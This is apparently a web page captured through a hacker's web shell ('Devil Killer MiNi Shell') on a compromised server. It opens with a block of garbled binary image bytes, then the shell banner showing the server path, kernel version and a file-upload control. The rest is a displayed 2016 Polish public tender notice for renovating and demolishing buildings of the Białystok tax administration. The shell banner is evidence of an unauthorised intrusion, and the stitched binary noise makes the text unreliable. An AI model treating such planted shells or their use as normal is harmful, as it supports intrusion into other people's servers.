JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161223/372983-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bialystok.apodatkowa.gov.pl ' target='_blank'>http://www.bialystok.apodatkowa.gov.pl </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 372983 - 2016
              z dnia 2016-12-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Białystok: Przebudowa budynku biurowego, przebudowa budynku garażowego oraz rozbiórka budynku garażowego i gospodarczego Izby Administracji Skarbowej w Białymstoku przy ul. J.K. Branickiego 9 wraz z zagospodarowaniem terenu.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Izba Administracji Skarbowej w Białymstoku, krajowy numer identyfikacyjny
              102112200000, ul.
              ul. Słonimska 
              1,
              15-026  
              Białystok, woj.
              podlaskie, państwo
              Polska, tel.
              85 8696018, 
85 7415797, e-mail
              is@pd.mofnet.gov.pl, faks
              85 7328221.
              <br />
              Adres strony internetowej (URL): www.bialystok.apodatkowa.gov.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bialystok.apodatkowa.gov.pl </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />poczta, kurier, osobiście <br />
                Adres:
                <br />1. Urząd Skarbowy w Suwałkach, ul. 1 Maja 2A, 16-400 Suwałki  z dopiskiem Izba Administracji Skarbowej  Skarbowej w Białymstoku pokój 234 </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa budynku biurowego, przebudowa budynku garażowego oraz rozbiórka budynku garażowego i gospodarczego Izby Administracji Skarbowej w Białymstoku przy ul. J.K. Branickiego 9 wraz z zagospodarowaniem terenu.<br /><b>Numer referencyjny: </b>2001-LO.260.18 .2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie budynku biurowego, przebudowie budynku garażowego oraz rozbiórce budynku garażowego i gospodarczego wraz z zagospodarowaniem terenu.           UWAGA: budynek biurowy i garaże są nieużytkowane.

1) Przebudowa istniejącego budynku biurowego wraz z zagospodarowaniem terenu, na działce numer ewidencyjny gruntu: 864, obręb: 17-Bojary, przy ul. J. K. Branickiego 9 w Białymstoku, obejmuje między innymi:
a) przebudowę budynku biurowego wraz z instalacjami wewnętrznymi;
b) przebudowę z rozbudową doziemnej zewnętrznej instalacji kanalizacji sanitarnej przy budynku biurowym (na dz. 864);
c) budowę doziemnych zewnętrznych instalacji kanalizacji deszczowej ze zbiornikiem retencyjnym (ZR2), o pojemności 20 m3 (na dz. 864);
d) budowę (wewnętrznej i zewnętrznej) instalacji drenażu opaskowego budynku biurowego,z odprowadzeniem wody do projektowanej przepompowni (PWD)
i odprowadzeniem wód do istniejącej kanalizacji deszczowej (na dz. 864);
e) budowę doziemnej zewnętrznej instalacji klimatyzacyjnej, doprowadzającej przewody chłodnicze do projekt. 5. jednostek zewnętrznych klimatyzatorów (na dz. 864);
f) budowę doziemnych zewnętrznych instalacji wody, na odcinkach od zbiorników retencyjnych (ZR1, ZR2) do zewnętrznych punktów poboru wody [na dz. 864];
g) budowa doziemnej zewnętrznej zapomiarowej instalacji energetycznej nN 0,4 kV, zasilającej przepompownie wód i projektowane jednostki zewnętrzne klimatyzatorów (na dz. 864);
h) budowę doziemnych zewnętrznych instalacji: wody zimnej, c.o., zapomiarowej instalacji elektroenergetycznej 0,4 kV kablowej (zasilającej budynek garażowy), na odcinku od budynku biurowego do budynku garażowego (na dz. 864);
i) budowę doziemnych zewnętrznych instalacji: kanalizacji sanitarnej i kanalizacji deszczowej ze zbiornikiem retencyjnym (ZR1), o pojemności 8,20 m3, budynku garażowego,
j) budowę ogrodzenia działki nr ewid. gr. 864 (na dz. 864), w linii rozgraniczającej z działkami nr ewid. gr. 865/3, 869 i 872/8  ogrodzenie o wysokości do 2,20 m.
Nie planuje się zmian w usytuowaniu istniejącej zabudowy na działce numer ewidencyjny gruntu: 864 i części dz. 891 (pas drogowy ul. J. K. Branickiego) w Białymstoku. Szczegółowy zakres planowanych robót budowlanych przebudowy budynku biurowego znajduje się w projektach budowlanych i wykonawczych wszystkich branż.

2) Budynek biurowy:
Projektowana przebudowa, na potrzeby Izby Administracji Skarbowej w Białymstoku  bez  zmiany sposobu użytkowania budynku biurowego  wymaga między innymi wykonania robót budowlanych:
a) demontaż pozostałego starego wyposażenia pomieszczeń, w tym: zabudów meblowych i urządzeń wraz z osprzętem w pomieszczeniach budynku;
b) przebudowa istniejących pomieszczeń, poprzez rozbiórkę istniejących ścian działowych wewnętrznych wraz z okładzinami i budowę nowych ścianek działowych;
c) budowa nowego szybu dźwigu osobowego (przystosowanego dla osób niepełnosprawnych) wraz z przebudową wejścia głównego do budynku (od ul. J. K. Branickiego);
d) zamurowania zbędnych otworów i wnęk, wykonanie nowych wnęk technicznych, w istniejących murach wewnętrznych;
e) wykonanie nowych otworów drzwiowych i poszerzenie światła otworów drzwiowych (ewakuacyjnych);
f) montaż elementów wydzieleń przeciwpożarowych i systemu oddymiania klatki schodowej;
g) rozbiórka istniejących schodów do piwnicy i uzupełnienie stropu, w miejscu po rozebranych schodach, w celu zapewnienia drogi ewakuacyjnej (z parteru na zewnątrz budynku);
h) budowa nowych schodów (z parteru do piwnicy);
i) wymiana stropu (nad II piętrem);
j) sprawdzenie drożności i udrożnienie, przez oczyszczenie, kanałów wentylacji grawitacyjnej istniejących w ścianach murowanych i budowa (uzupełnienie) brakujących kanałów
i kominów wentylacji grawitacyjnej;
k) wymiana i uzupełnienie podłóg betonowych na gruncie wraz z izolacją przeciw wilgoci i wodzie gruntowej, wymiana wszystkich podłóg na stropach wraz z wymianą i uzupełnieniem izolacji oraz wykonanie nowych posadzek w pomieszczeniach;
l) wymiana i wykonanie nowych tynków wewnętrznych cementowo-wapiennych,  okładzin ściennych wewnętrznych i prac malarskich we wnętrzach;
m) zabezpieczenie przeciwpożarowe drewnianych konstrukcji istniejącego stropu nad III piętrem, za pomocą środków impregnujących i przeciwpożarowej zabudowy sufitowej poddasza (z płyt gipsowo-kartonowych, w klasie odporności ogniowej REI 60), z izolacją wełną mineralną;
n) uzupełnienie ubytków i naprawy po planowanych robotach instalacyjnych (po przebudowie instalacji sanitarnych, elektrycznych i teletechnicznych);
o) wymiana wewnętrznej stolarki i ślusarki drzwiowej (m.in. na przeciwpożarowe) oraz wymiana wyłazu na strych [ze składaną drabiną];
p) wymiana zewnętrznych betonowych studzienek podokiennych na nowe;
q) wymiana wszystkich okien w piwnicy budynku oraz okien zewnętrznych od strony ul. J.K. Branickiego na nowe;
r) wymiana wszystkich parapetów okiennych;
s) montaż nowych sufitów podwieszonych, na parterze oraz na I i II piętrze.
	Ponadto projektowana jest wymiana i przebudowa wszystkich instalacji wewnętrznych w budynku biurowym rozbiórka i budowa nowych wewnętrznych instalacji sanitarnych (wody zimnej, kanalizacji sanitarnej, z wyłączeniem części c.o., klimatyzacji), wentylacji grawitacyjnej (ze wspomaganiem mechanicznym) oraz nowych instalacji elektrycznych (zasilającej, oświetleniowej) i teletechnicznych, z niezbędnym osprzętem, we wszystkich pomieszczeniach budynku.	
			
3)       Budynek garażowy 
Projektowana przebudowa istniejącego budynku garażowego  na potrzeby Izby Administracji  Skarbowej w Białymstoku  wymaga między innymi wykonania robót budowlanych:
a)demontaż starego wyposażenia pomieszczeń, w tym demontaż: zabudowy meblowej, urządzeń wraz z osprzętem i stolarki drzwiowej wewnętrznej, we wszystkich pomieszczeniach;
b)demontaż krat stalowych (4 szt.), istniejących na elewacjach zewnętrznych oraz zewnętrznej stolarki budowlanej: okien (3 szt.) i (7 szt.) drzwi (w osiach: B i 2 budynku);
c)zamurowania istniejących, zbędnych otworów okiennych w ścianie szczytowej (w osi B budynku);
d)rozbiórka istniejących wewnętrznych instalacji wraz z osprzętem;
e)rozbiórka istniejącego dachu (o konstrukcji drewnianej), a następnie stropu (typu Kleina, na belkach stalowych), podciągów i słupów w budynku;
f)rozbiórka istniejących ścian wewnętrznych i ścianek działowych z okładzinami;
g)rozbiórka istniejących posadzek, podłóg betonowych na gruncie oraz kanału rewizyjnego do napraw samochodów;
h)przebudowa ściany frontowej (w osi 2 budynku), polegająca na wykonaniu:  fundamentów, nowych poszerzonych otworów drzwiowych z nadprożami ocieplonej ściany trójwarstwowej zewnętrznej;
i)przebudowa zwieńczenia ściany zewnętrznej (w osi 1 budynku), polegająca na wykonaniu: nowych wieńców żelbetowych, przemurowaniu części ściany  wraz
z uzupełnieniem brakujących przewodów wentylacji grawitacyjnej;
j)odbudowa dachu płaskiego, jednospadowego (o konstrukcji drewnianej) wraz z pokryciem (nową blachę płaską stalową ocynkowaną, powlekaną, łączoną na rąbek stojący),
z obróbkami blacharskimi, rynnami i rurami spustowymi;
k)wymiana tynków zewnętrznych, wykonanie nowych tradycyjnych tynków
cementowo-wapiennych i kolorystyki elewacji zewnętrznych;
l)wymiana z uzupełnieniem izolacji pionowych i poziomych, zabezpieczających mury konstrukcji budynku przeciw wilgoci i wodzie gruntowej;
ł)wykonanie nowych podłóg betonowych na gruncie wraz z izolacją przeciw wilgoci i wodzie gruntowej oraz izolacją termiczną; 
m)budowa nowych, murowanych ścianek działowych pomieszczeń garażu;
n)docieplenie istniejących ścian zewnętrznych budynku (od wewnątrz);
o)wymiana i wykonanie nowych tynków wewnętrznych cementowo-wapiennych oraz okładzin (z płytek ceramicznych) w pomieszczeniach; 
p)wykonanie w pomieszczeniach nowych posadzek przemysłowych (posadzek epoksydowych i posadzek z płytek ceramicznych);
r)zabezpieczenie przeciwpożarowe projekt. konstrukcji drewnianej, nowego dachu, za pomocą środków impregnujących i przeciwpożarowej zabudowy sufitowej poddasza z płyt gipsowo-kartonowych [w klasie odporności ogniowej REI 30] wraz z izolacją termiczną wełną mineralną;
s)wykonanie prac malarskich we wnętrzach;
t)montaż nowych (5 szt.) bram garażowych segmentowych oraz (2 szt.) drzwi zewnętrznych, izolowanych termicznie.
	Ponadto wymiana wszystkich instalacji wewnętrznych w budynku garażowym tj. budowa nowych instalacji sanitarnych (wody zimnej, kanalizacji sanitarnej, c.o.), wentylacji grawitacyjnej oraz nowych instalacji elektrycznych (zasilającej, oświetleniowej), z niezbędnym osprzętem, we wszystkich pomieszczeniach.

4) Rozbiórka budynku garażowego i gospodarczego 
	Budynek garażowy do rozbiórki:
Budynek jednokondygnacyjny, niepodpiwniczony dwunawowy, przykryty dachem dwuspadowym ze spadkiem ukształtowanym w kierunku do frontu budynku i w kierunku tylnej ściany, wykonany w konstrukcji drewnianej szkieletowej; poszycie ścian z desek gr. 2,2-2,5cm z wyjątkiem ściany tylnej, którą wykonano jako murowaną z bloczków wapienno-piaskowych gr. 12cm. Dach krokwiowy belkowy, oparty na ścianach podłużnych zewnętrznych oraz na płatwi kalenicowej i słupach drewnianych. Rozstaw słupów max co 440cm. Krokwie o przekroju 10x12cm w rozstawie co 70cm. Część krokwi jest spróchniałych. Poszycie dachu wykonano z desek. Słupy wykonano z krawędziaków 5x10cm. Do tylnej ściany przylega ściana murowana o grubości 12cm i wysokości ok. 2,0m z cegieł wapienno-piaskowych. Budynek posadowiono na ławach i stopach fundamentowych. Posadzki wykonano jako betonowe. Pokrycie dachu wykonano z papy. Do budynku garażowego przylega budynek gospodarczy w konstrukcji drewnianej, przeznaczony do wyburzenia.
Podstawowe wymiary budynku garażowego:
- długość : 15,00m, szerokość : 8,40m, wysokość : 3,40m

5) Budynek gospodarczy do rozbiórki:
Jednokondygnacyjny, niepodpiwniczony, przykryty dachem jednospadowym ze spadkiem ukształtowanym w kierunku od granicy działki, wykonany w konstrukcji drewnianej szkieletowej. Głównymi elementami konstrukcyjnymi są słupy drewniane, na których opierają się belki drewniane. Na belkach oparte są krokwie drewniane. Rygle ścienne wykonano z krawędziaków drewnianych mocowanych do słupów. Poszycie ścian wykonano głównie z desek o grubości 2,2-2,5cm mocowanych do rygli ściennych. Poszycie dachu wykonano z desek a pokrycie z papy. Budynek posadowiono na ławach istopach fundamentowych. Do budynku gospodarczego przylega budynek garażowy w konstrukcji drewnianej, przeznaczony do wyburzenia oraz budynek garażowy murowany nie przewidziany do rozbiórki. Budynek murowany na styku
z budynkiem gospodarczym ma własną ścianę.
Podstawowe wymiary budynku gospodarczego
- długość : 14,7m, szerokość : 7,0 do 4,60m, wysokość : 3,40m.

Klauzula społeczna  
1) Na podstawie art. 29 ust. 4 Pzp Zamawiający wymaga zatrudnienia w pełnym wymiarze czasu pracy, wśród osób bezpośrednio uczestniczących w wykonywaniu zamówienia, co najmniej jednej osoby bezrobotnej, co oznacza osobę spełniającą przesłanki art. 2 ust. 1 pkt 2 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t.j. Dz. U. z 2016 r., poz. 645 z późn. zm.) lub co najmniej jednej osoby niepełnosprawnej, co oznacza osobę spełniającą przesłanki  statusu niepełnosprawności określone ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych (Dz.U. z 2011 r. Nr 127, poz. 721 z późn.zm.). 
2) Zatrudnienie powinno trwać do końca realizacji przedmiotu umowy w sprawie zamówienia publicznego.  <br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45111000-8,
                45262500-6,
                45300000-0,
                45310000-3,
                45330000-9,
                45331000-6,
                45400000-1,
                45421130-4,
                45443000-4,
                45450000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wykonawca w ofercie określi termin zakończenia robót budowlanych. Termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert. Termin 31/10/2016r jest terminem ostatecznym.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 
Wykonawca
1. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia do wysokości nie mniejszej niż 1.000.000,00 zł (słownie złotych: jeden milion).       
2. posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500.000,00 zł; (słownie złotych: pięćset tysięcy).<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca 
1. wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 2 roboty budowlane, których zakres obejmował budowę/rozbudowę/modernizację obiektów o wielkości min. 1000 m powierzchni użytkowej, o wartości nie mniejszej niż 2.000.000,00 zł (słownie złotych: dwa miliony) każda, 
2. do realizacji zamówienia dysponuje osobami spełniającymi następujące wymagania:
- osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymii pełnienie funkcji Kierownika budowy, pozwalające pełnić samodzielnie funkcje techniczne  w budownictwie, w specjalności konstrukcyjno  budowlanej bez ograniczeń, wpisaną na listę członków właściwej izby samorządu zawodowego i posiada aktualne zaświadczenie potwierdzone przez tą izbę, 
- osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi, pozwalające pełnić samodzielnie funkcje techniczne w budownictwie, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wpisaną na listę członków właściwej izby samorządu zawodowego i posiadać aktualne zaświadczenie potwierdzone przez tą izbę, 
- osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi, pozwalające pełnić samodzielnie funkcje techniczne  w budownictwie, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych, wpisaną na listę członków właściwej izby samorządu zawodowego i posiadać aktualne zaświadczenie potwierdzone przez tą izbę, 
- osobą posiadającą uprawnienia w specjalności telekomunikacyjnej.
Zamawiający dopuszcza łączenie posiadania uprawnień.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
